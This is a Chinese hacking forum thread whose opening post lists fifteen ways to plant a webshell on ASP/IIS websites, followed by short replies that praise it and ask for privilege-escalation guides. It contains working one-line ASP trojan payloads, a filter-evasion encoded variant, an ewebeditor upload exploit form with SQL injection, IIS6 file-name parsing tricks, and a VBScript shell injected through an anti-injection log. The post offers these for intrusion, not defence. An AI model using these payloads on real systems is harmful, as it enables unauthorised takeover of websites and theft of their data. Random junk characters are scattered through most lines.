返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式4 f# B# m* m, r( {
" k9 [5 a0 D! U2 q- X3 `
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
, L- U8 Y: O1 k+ P2 H, ?$ g$ k: i1 E
; n9 L9 s' m5 Q8 H1 e5 |1 L2 E+ G3.上传漏洞:# Y- K5 [3 D& P& {( o
+ Q4 i; N' c" ]' Z% h
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00; n% w" R2 i5 j* q3 D+ Q! u/ U; ~

1 f4 v3 f/ r* ?$ r- q逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
# X; v- c2 @4 v( M: y2 W% D4 x
3 L9 r2 Z$ J$ Z2 l- [% k7 C雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp" H% m, h2 b0 h3 i; Q, i
然后在上传文件里面填要传的图片格式的ASP木马
$ W& s" F! H8 Y6 M9 p! s, x. N就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp  b$ ]# G6 t! z0 T/ X0 ~& V2 T
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传3 s- L: O9 ^: o/ O; X

3 Q. L1 w3 {5 R<html>
0 [" J1 I+ j! q0 \+ D<head>. [5 h/ q5 y+ K8 a1 u
<title>ewebeditor upload.asp上传利用</title>
- x1 X8 l. b# L) M</head>. U; |' I5 C$ l% D
<body>" O/ ~4 {, `$ o
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
- I8 J" ], h# b2 w: i: G<input type=file name=uploadfile size=100><br><br>- S* \" z. I; Q4 r1 c( V, c1 D
<input type=submit value=Fuck>% r  V3 Q; N  R
</form>  h1 O$ C# D4 z7 a  B% {% L
</body>
8 u# U$ I* x7 b* d) ^/ J$ A1 R</form>, k$ r2 ]6 L0 ?0 D; R
</html>
6 V3 I1 f, E1 a
) ~+ ?' d0 m  ~' I% S2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
9 u- o$ [0 Q5 o3 E# L. l* X% c" r3 K1 w5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp+ _8 n& c% R6 r. B' J! U  w0 j0 d& h! [+ J
6 k9 b+ {7 L+ I4 ~' ^
利用windows2003解析。建立zjq.asp的文件夹# v  }) T% X4 s
0 c8 q$ d" @; Q! {8 F. e
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型$ e/ O6 Y0 J  u' a: T, O7 d

1 N4 Q2 ?4 L, T2 j/ C; S% r0 X7.cuteeditor:类似ewebeditor0 V3 U5 V0 X. K

6 q( j) i# {! N8.htmleditor:同上" l5 s0 ?% M& s: ?9 [
. D8 o$ m+ p* P' O" e: B4 D! x
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破* F/ k: X5 _( U* D1 F# p: Q
0 j7 \+ M* i) E$ o
<%execute request("value")%><%'<% loop <%:%>
) g2 ?0 o5 h5 F: {9 o+ @3 i/ @8 Q, b+ Y3 ?7 a9 v/ F. D7 s
<%'<% loop <%:%><%execute request("value")%>
. L3 f3 B8 Q* |: d" m1 t7 y6 ^  {: t
0 c1 T2 W$ h- h" C* C8 U- `/ E! P<%execute request("value")'<% loop <%:%>! a& o+ f5 x/ y3 \9 w2 X5 _7 |9 K
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
1 o; p2 W+ p7 }: n* \" v
" t# Y6 k( K- q( J4 |. |10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞0 _% [; I2 G( V

, C; `7 G+ G& r) b; ?: J1 I11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
  N* @3 P7 Z# V$ E6 Y
  k% x/ u1 o% y" S8 x解析漏洞得到webshell
7 L& C2 s9 i, n5 p+ ~/ `9 J3 }' G3 ~/ i) @! z
12.mssql差异备份,日志备份,前提需知道web路径7 J( Z1 v7 U2 C/ Y
: b/ l) d8 N* a, ?
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell3 a! V7 ~* R' ~. L
/ a) n7 S9 M  J- D. {
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell# z5 ?0 o5 v1 u. j
! \& b& V) _2 u8 K
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可4 ^5 L" V( D9 U: f: `+ b

. N2 S5 J2 m8 b* s以上只是本人的一些拙见,并不完善,以后想到了再继续添加
. u" S; H; s4 T( q2 S. b不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
. i; @. }3 Q0 q2 ^+ U* g0 X- s1 D" d* P0 K3 L
+ J0 N; \7 q  N) S, T# }
很好啊、基本的入侵方法都包含了& Q0 j3 E! A; }9 Q  `/ }4 x
! Y0 v* T2 t! s2 S* l$ b7 O2 z
最好来个提权的帖子再。
8 ~/ d2 E, o$ O( M2 I8 U
1 H/ h4 o6 n2 r6 p) D* X; s4 w- N4 A不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表